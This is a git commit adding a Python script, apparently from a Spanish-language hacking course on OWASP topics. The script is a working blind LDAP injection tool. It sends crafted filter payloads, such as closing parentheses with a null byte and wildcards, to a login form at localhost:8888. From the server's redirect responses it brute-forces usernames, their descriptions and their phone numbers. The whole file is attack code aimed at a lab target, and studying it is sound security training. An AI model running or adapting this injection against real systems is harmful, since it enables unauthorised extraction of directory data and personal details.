Update tema 6 - ldapi

2024-02-17 16:31:45 +01:00
parent 8f96712d57
commit cb6bcbcc86
2 changed files with 322 additions and 0 deletions
--- a/Introduccion-hacking-hack4u/tema_6_owasp/14_ldapi/ldapi.py
+++ b/Introduccion-hacking-hack4u/tema_6_owasp/14_ldapi/ldapi.py
@@ -0,0 +1,229 @@
+#!/usr/bin/env python3
+
+import os
+# import pdb # Librería para debuguear
+import requests
+import signal
+import sys
+import string
+import time
+
+from pwn import *
+from termcolor import colored
+
+
+def signal_handler(sig, frame):
+    """
+    Signal handler for Ctrl+C
+    """
+
+    print(colored('\n\n[!] Saliendo...\n', 'red'))
+    sys.exit(0)
+
+
+signal.signal(signal.SIGINT, signal_handler)
+
+
+# Variables globales
+MAIN_URL = 'http://localhost:8888/'
+BURP_PROXY = {'http': 'http://127.0.0.1:8080'}
+HEADERS = {'Content-Type': 'application/x-www-form-urlencoded'}
+NUMBERS = string.digits
+CHARACTERS = string.ascii_lowercase + NUMBERS + " áéíóúñüç"
+
+# Limpiar pantalla
+os.system('clear')
+
+
+def getInitialUsers():
+    """
+    Obtiene la lista inicial de usuarios
+    """
+
+    # pdb.set_trace()
+
+    initial_users = []
+
+    for character in CHARACTERS:
+
+        post_data = f"user_id={character}*&password=*&login=1&submit=Submit"
+
+        r = requests.post(
+            MAIN_URL, data=post_data,
+            headers=HEADERS,
+            # proxies=BURP_PROXY,
+            allow_redirects=False
+        )
+
+        if r.status_code == 301:
+            initial_users.append(character)
+
+    return initial_users
+
+
+def getUsers(initial_users):
+    """
+    Obtiene la lista de usuarios válidos
+    """
+
+    valid_users = []
+
+    for first_character in initial_users:
+
+        user = ""
+
+        for position in range(0, 15):
+
+            for character in CHARACTERS:
+
+                post_data = f"user_id={first_character}{user}{character}*&password=*&login=1&submit=Submit"
+
+                r = requests.post(
+                    MAIN_URL, data=post_data,
+                    headers=HEADERS,
+                    allow_redirects=False
+                )
+
+                if r.status_code == 301:
+                    user += character
+                    break
+
+        if not user:
+            break
+
+        username = first_character + user
+        valid_users.append(username)
+
+    return valid_users
+
+
+def getDescription(users):
+    """
+    Obtiene las descripciones para los usuarios dados
+    """
+
+    user_descriptions = {}
+
+    for user in users:
+
+        description = ""
+
+        for position in range(0, 25):
+
+            for character in CHARACTERS:
+
+                post_data = f"user_id={user})(description={description}{character}*))%00&password=*&login=1&submit=Submit"
+
+                r = requests.post(
+                    MAIN_URL, data=post_data,
+                    headers=HEADERS,
+                    allow_redirects=False
+                )
+
+                if r.status_code == 301:
+                    description += character
+                    break
+
+        if not description:
+            break
+
+        user_descriptions[user] = description
+
+    return user_descriptions
+
+
+def getPhones(users):
+    """
+    Obtiene los teléfonos para los usuarios dados
+    """
+
+    user_phones = {}
+
+    for user in users:
+
+        phone = ""
+
+        for position in range(0, 9):
+
+            for number in NUMBERS:
+
+                post_data = f"user_id={user})(telephoneNumber={phone}{number}*))%00&password=*&login=1&submit=Submit"
+
+                r = requests.post(
+                    MAIN_URL, data=post_data,
+                    headers=HEADERS,
+                    allow_redirects=False
+                )
+
+                if r.status_code == 301:
+                    phone += number
+                    break
+
+        user_phones[user] = phone
+
+    return user_phones
+
+
+def main():
+    """
+    Función principal
+    """
+
+    p1 = log.progress(colored("Fuerza bruta contra el LDAP", 'blue'))
+    p1.status(colored("Iniciando ataque", 'magenta'))
+
+    time.sleep(1)
+
+    p1.status(colored("Atacando usuarios", 'magenta'))
+    p2 = log.progress(colored("Buscando usuarios", 'blue'))
+    initial_users = getInitialUsers()
+    valid_users = getUsers(initial_users)
+    p2.success(colored(f"Usuarios encontrados: {valid_users}", 'green'))
+
+    time.sleep(1)
+
+    p1.status(colored("Atacando descripciones", 'magenta'))
+    p3 = log.progress(colored("Buscando descripciones", 'blue'))
+    user_descriptions = getDescription(valid_users)
+    descriptions_list = list(user_descriptions.values())
+    p3.success(
+        colored(f"Descripciones encontradas: {descriptions_list}", 'green'))
+
+    time.sleep(1)
+
+    p1.status(colored("Atacando teléfonos", 'magenta'))
+    p4 = log.progress(colored("Buscando Teléfonos", 'blue'))
+    user_phones = getPhones(valid_users)
+    phones_list = list(user_phones.values())
+    p4.success(colored(f"Teléfonos encontrados: {phones_list}", 'green'))
+
+    time.sleep(1)
+
+    usuario_descripcion_telefono = set(
+        user_descriptions.keys()).union(user_phones.keys())
+
+    p1.success(colored("Ataque finalizado", 'magenta'))
+
+    time.sleep(2)
+
+    print(colored("\n\n[+] Resumen:\n", 'green'))
+
+    for user in usuario_descripcion_telefono:
+
+        description = user_descriptions.get(user, "No tiene descripción")
+        phone = user_phones.get(user, "No tiene teléfono")
+
+        if description == "":
+            description = "No tiene descripción"
+        if phone == "":
+            phone = "No tiene teléfono"
+
+        print(colored(
+            f"\n[+] Usuario: {user}\n    Descripción: {description}\n    Teléfono: {phone}",
+            'green'
+        ))
+
+
+if __name__ == '__main__':
+
+    main()